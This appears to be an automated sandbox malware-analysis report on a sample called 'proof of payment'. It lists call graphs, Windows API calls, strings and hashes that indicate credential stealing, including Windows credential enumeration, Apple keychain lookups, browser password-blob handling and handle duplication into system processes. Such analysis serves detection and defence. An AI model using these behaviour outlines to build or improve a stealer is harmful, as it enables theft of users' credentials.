memcpy 40551->40559 40553 423ca5 40554 415a91 memset 40553->40554 40555 423cc3 40554->40555 40555->40195 40556->40195 40557->40195 40558->40193 40559->40553 40591 41493c EnumResourceNamesW 37677 4287c1 37678 4287d2 37677->37678 37679 429ac1 37677->37679 37680 428818 37678->37680 37681 42881f 37678->37681 37696 425711 37678->37696 37691 425ad6 37679->37691 37747 415c56 11 API calls 37679->37747 37714 42013a 37680->37714 37742 420244 97 API calls 37681->37742 37686 4260dd 37741 424251 120 API calls 37686->37741 37688 4259da 37740 416760 11 API calls 37688->37740 37694 422aeb memset memcpy memcpy 37694->37696 37695 429a4d 37697 429a66 37695->37697 37701 429a9b 37695->37701 37696->37679 37696->37688 37696->37694 37696->37695 37699 4260a1 37696->37699 37710 4259c2 37696->37710 37713 425a38 37696->37713 37730 4227f0 memset memcpy 37696->37730 37731 422b84 15 API calls 37696->37731 37732 422b5d memset memcpy memcpy 37696->37732 37733 422640 13 API calls 37696->37733 37735 4241fc 11 API calls 37696->37735 37736 42413a 90 API calls 37696->37736 37743 415c56 11 API calls 37697->37743 37739 415c56 11 API calls 37699->37739 37702 429a96 37701->37702 37745 416760 11 API calls 37701->37745 37746 424251 120 API calls 37702->37746 37705 429a7a 37744 416760 11 API calls 37705->37744 37710->37691 37734 415c56 11 API calls 37710->37734 37713->37710 37737 422640 13 API calls 37713->37737 37738 4226e0 12 API calls 37713->37738 37715 42014c 37714->37715 37718 420151 37714->37718 37757 41e466 97 API calls 37715->37757 37717 420162 37717->37696 37718->37717 37719 4201b3 37718->37719 37720 420229 37718->37720 37721 4201b8 37719->37721 37722 4201dc 37719->37722 37720->37717 37723 41fd5e 86 API calls 37720->37723 37748 41fbdb 37721->37748 37722->37717 37726 4201ff 37722->37726 37754 41fc4c 37722->37754 37723->37717 37726->37717 37729 42013a 97 API calls 37726->37729 37729->37717 37730->37696 37731->37696 37732->37696 37733->37696 37734->37688 37735->37696 37736->37696 37737->37713 37738->37713 37739->37688 37740->37686 37741->37691 37742->37696 37743->37705 37744->37702 37745->37702 37746->37679 37747->37688 37749 41fbf1 37748->37749 37750 41fbf8 37748->37750 37753 41fc39 37749->37753 37772 4446ce 11 API calls 37749->37772 37762 41ee26 37750->37762 37753->37717 37758 41fd5e 37753->37758 37755 41ee6b 86 API calls 37754->37755 37756 41fc5d 37755->37756 37756->37722 37757->37718 37760 41fd65 37758->37760 37759 41fdab 37759->37717 37760->37759 37761 41fbdb 86 API calls 37760->37761 37761->37760 37763 41ee41 37762->37763 37764 41ee32 37762->37764 37773 41edad 37763->37773 37776 4446ce 11 API calls 37764->37776 37767 41ee3c 37767->37749 37770 41ee58 37770->37767 37778 41ee6b 37770->37778 37772->37753 37782 41be52 37773->37782 37776->37767 37777 41eb85 11 API calls 37777->37770 37779 41ee70 37778->37779 37780 41ee78 37778->37780 37838 41bf99 86 API calls 37779->37838 37780->37767 37783 41be6f 37782->37783 37784 41be5f 37782->37784 37790 41be8c 37783->37790 37803 418c63 37783->37803 37817 4446ce 11 API calls 37784->37817 37787 41be69 37787->37767 37787->37777 37788 41bee7 37788->37787 37821 41a453 86 API calls 37788->37821 37790->37787 37790->37788 37791 41bf3a 37790->37791 37794 41bed1 37790->37794 37820 4446ce 11 API calls 37791->37820 37793 41bef0 37793->37788 37796 41bf01 37793->37796 37794->37793 37797 41bee2 37794->37797 37795 41bf24 memset 37795->37787 37796->37795 37798 41bf14 37796->37798 37818 418a6d memset memcpy memset 37796->37818 37807 41ac13 37797->37807 37819 41a223 memset memcpy memset 37798->37819 37802 41bf20 37802->37795 37806 418c72 37803->37806 37804 418c94 37804->37790 37805 418d51 memset memset 37805->37804 37806->37804 37806->37805 37808 41ac52 37807->37808 37809 41ac3f memset 37807->37809 37812 41ac6a 37808->37812 37822 41dc14 19 API calls 37808->37822 37810 41acd9 37809->37810 37810->37788 37814 41aca1 37812->37814 37823 41519d 37812->37823 37814->37810 37815 41acc0 memset 37814->37815 37816 41accd memcpy 37814->37816 37815->37810 37816->37810 37817->37787 37818->37798 37819->37802 37820->37788 37822->37812 37826 4175ed 37823->37826 37834 417570 SetFilePointer 37826->37834 37829 41760a ReadFile 37830 417637 37829->37830 37831 417627 GetLastError 37829->37831 37832 4151b3 37830->37832 37833 41763e memset 37830->37833 37831->37832 37832->37814 37833->37832 37835 4175b2 37834->37835 37836 41759c GetLastError 37834->37836 37835->37829 37835->37832 37836->37835 37837 4175a8 GetLastError 37836->37837 37837->37835 37838->37780 37839 417bc5 37840 417c61 37839->37840 37845 417bda 37839->37845 37841 417bf6 UnmapViewOfFile CloseHandle 37841->37841 37841->37845 37843 417c2c 37843->37845 37851 41851e 20 API calls 37843->37851 37845->37840 37845->37841 37845->37843 37846 4175b7 37845->37846 37847 4175d6 FindCloseChangeNotification 37846->37847 37848 4175c8 37847->37848 37849 4175df 37847->37849 37848->37849 37850 4175ce Sleep 37848->37850 37849->37845 37850->37847 37851->37843 39841 4147f3 39844 414561 39841->39844 39843 414813 39845 41456d 39844->39845 39846 41457f GetPrivateProfileIntW 39844->39846 39849 4143f1 memset _itow WritePrivateProfileStringW 39845->39849 39846->39843 39848 41457a 39848->39843 39849->39848

                                      Executed Functions

                                      Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                      APIs
                                      • memset.MSVCRT ref: 0040DDAD
                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                      • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                        • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                      • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                      • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                      • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                      • _wcsicmp.MSVCRT ref: 0040DEB2
                                      • _wcsicmp.MSVCRT ref: 0040DEC5
                                      • _wcsicmp.MSVCRT ref: 0040DED8
                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                      • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                      • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                      • memset.MSVCRT ref: 0040DF5F
                                      • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                      • _wcsicmp.MSVCRT ref: 0040DFB2
                                      • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                      • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                      • API String ID: 594330280-3398334509
                                      • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                      • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                      • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                      • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                        • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                        • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                      • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                      • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                      • String ID:
                                      • API String ID: 2947809556-0
                                      • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                      • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                      • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                      • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                      • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: FileFind$FirstNext
                                      • String ID:
                                      • API String ID: 1690352074-0
                                      • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                      • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                      • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                      • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 0041898C
                                      • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: InfoSystemmemset
                                      • String ID:
                                      • API String ID: 3558857096-0
                                      • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                      • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                      • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                      • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 38 44558e-445594 call 444b06 4->38 39 44557e-44558c call 4136c0 call 41366b 4->39 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 42 445823-445826 14->42 15->16 22 445672-445683 call 40a889 call 403fbe 16->22 23 4455fb-445601 16->23 49 445879-44587c 18->49 24 44594f-445958 19->24 25 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->25 82 445685 22->82 83 4456b2-4456b5 call 40b1ab 22->83 34 445605-445607 23->34 35 445603 23->35 32 4459f2-4459fa 24->32 33 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 24->33 134 44592d-445945 call 40b6ef 25->134 135 44594a 25->135 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 32->44 45 445b29-445b32 32->45 153 4459d0-4459e8 call 40b6ef 33->153 154 4459ed 33->154 34->22 41 445609-44560d 34->41 35->34 38->3 39->38 41->22 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 63 4458a2-4458aa call 40b1ab 49->63 64 44587e 49->64 150 445665-445670 call 40b1ab 50->150 151 445643-445663 call 40a9b5 call 4087b3 50->151 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 87 445fae-445fb2 60->87 88 445d2b-445d3b 60->88 168 445cf5 61->168 169 445cfc-445d03 61->169 63->19 80 445884-44589d call 40a9b5 call 4087b3 64->80 137 445849 66->137 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 156 44589f 80->156 81->53 99 44568b-4456a4 call 40a9b5 call 4087b3 82->99 115 4456ba-4456c4 83->115 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->90 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 129 4457f9 115->129 130 4456ca-4456d3 call 413cfa call 413d4c 115->130 129->6 172 4456d8-4456f7 call 40b2cc call 413fa6 130->172 134->135 135->24 137->51 150->115 151->150 153->154 154->32 156->63 158->83 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->87 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->87 255 445f9b 218->255 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                      APIs
                                      • memset.MSVCRT ref: 004455C2
                                      • wcsrchr.MSVCRT ref: 004455DA
                                      • memset.MSVCRT ref: 0044570D
                                      • memset.MSVCRT ref: 00445725
                                        • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                        • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                        • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                        • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                        • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                        • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                        • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                        • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                      • memset.MSVCRT ref: 0044573D
                                      • memset.MSVCRT ref: 00445755
                                      • memset.MSVCRT ref: 004458CB
                                      • memset.MSVCRT ref: 004458E3
                                      • memset.MSVCRT ref: 0044596E
                                      • memset.MSVCRT ref: 00445A10
                                      • memset.MSVCRT ref: 00445A28
                                      • memset.MSVCRT ref: 00445AC6
                                        • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                        • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                        • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                        • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                        • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                      • memset.MSVCRT ref: 00445B52
                                      • memset.MSVCRT ref: 00445B6A
                                      • memset.MSVCRT ref: 00445C9B
                                      • memset.MSVCRT ref: 00445CB3
                                      • _wcsicmp.MSVCRT ref: 00445D56
                                      • memset.MSVCRT ref: 00445B82
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                      • memset.MSVCRT ref: 00445986
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                      • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                      • API String ID: 2745753283-3798722523
                                      • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                      • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                      • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                      • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041276D Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 149COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                        • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                        • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                        • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                      • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                      • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                      • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                      • String ID: $/deleteregkey$/savelangfile
                                      • API String ID: 2744995895-28296030
                                      • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                      • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                      • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                      • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • memset.MSVCRT ref: 0040B71C
                                        • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                        • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                      • wcsrchr.MSVCRT ref: 0040B738
                                      • memset.MSVCRT ref: 0040B756
                                      • memset.MSVCRT ref: 0040B7F5
                                      • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                      • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                      • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                      • memset.MSVCRT ref: 0040B851
                                      • memset.MSVCRT ref: 0040B8CA
                                      • memcmp.MSVCRT ref: 0040B9BF
                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                      • memset.MSVCRT ref: 0040BB53
                                      • memcpy.MSVCRT ref: 0040BB66
                                      • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                      • String ID: chp$v10
                                      • API String ID: 170802307-2783969131
                                      • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                      • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                      • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                      • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 504 4091b8-40921b memset call 40a6e6 call 444432 509 409520-409526 504->509 510 409221-40923b call 40b273 call 438552 504->510 514 409240-409248 510->514 515 409383-4093ab call 40b273 call 438552 514->515 516 40924e-409258 call 4251c4 514->516 528 4093b1 515->528 529 4094ff-40950b call 443d90 515->529 521 40937b-40937e call 424f26 516->521 522 40925e-409291 call 4253cf * 2 call 4253af * 2 516->522 521->515 522->521 552 409297-409299 522->552 532 4093d3-4093dd call 4251c4 528->532 529->509 538 40950d-409511 529->538 539 4093b3-4093cc call 4253cf * 2 532->539 540 4093df 532->540 538->509 542 409513-40951d call 408f2f 538->542 539->532 555 4093ce-4093d1 539->555 543 4094f7-4094fa call 424f26 540->543 542->509 543->529 552->521 554 40929f-4092a3 552->554 554->521 556 4092a9-4092ba 554->556 555->532 557 4093e4-4093fb call 4253af * 2 555->557 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->543 569 409401-409403 557->569 558->559 560 409333-409345 memcmp 559->560 561 4092e5-4092ec 559->561 560->521 564 409347-40935f memcpy 560->564 561->521 563 4092f2-409331 memcpy * 2 561->563 566 409363-409378 memcpy 563->566 564->566 566->521 569->543 570 409409-40941b memcmp 569->570 570->543 571 409421-409433 memcmp 570->571 572 4094a4-4094b6 memcmp 571->572 573 409435-40943c 571->573 572->543 575 4094b8-4094ed memcpy * 2 572->575 573->543 574 409442-4094a2 memcpy * 3 573->574 576 4094f4 574->576 575->576 576->543
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
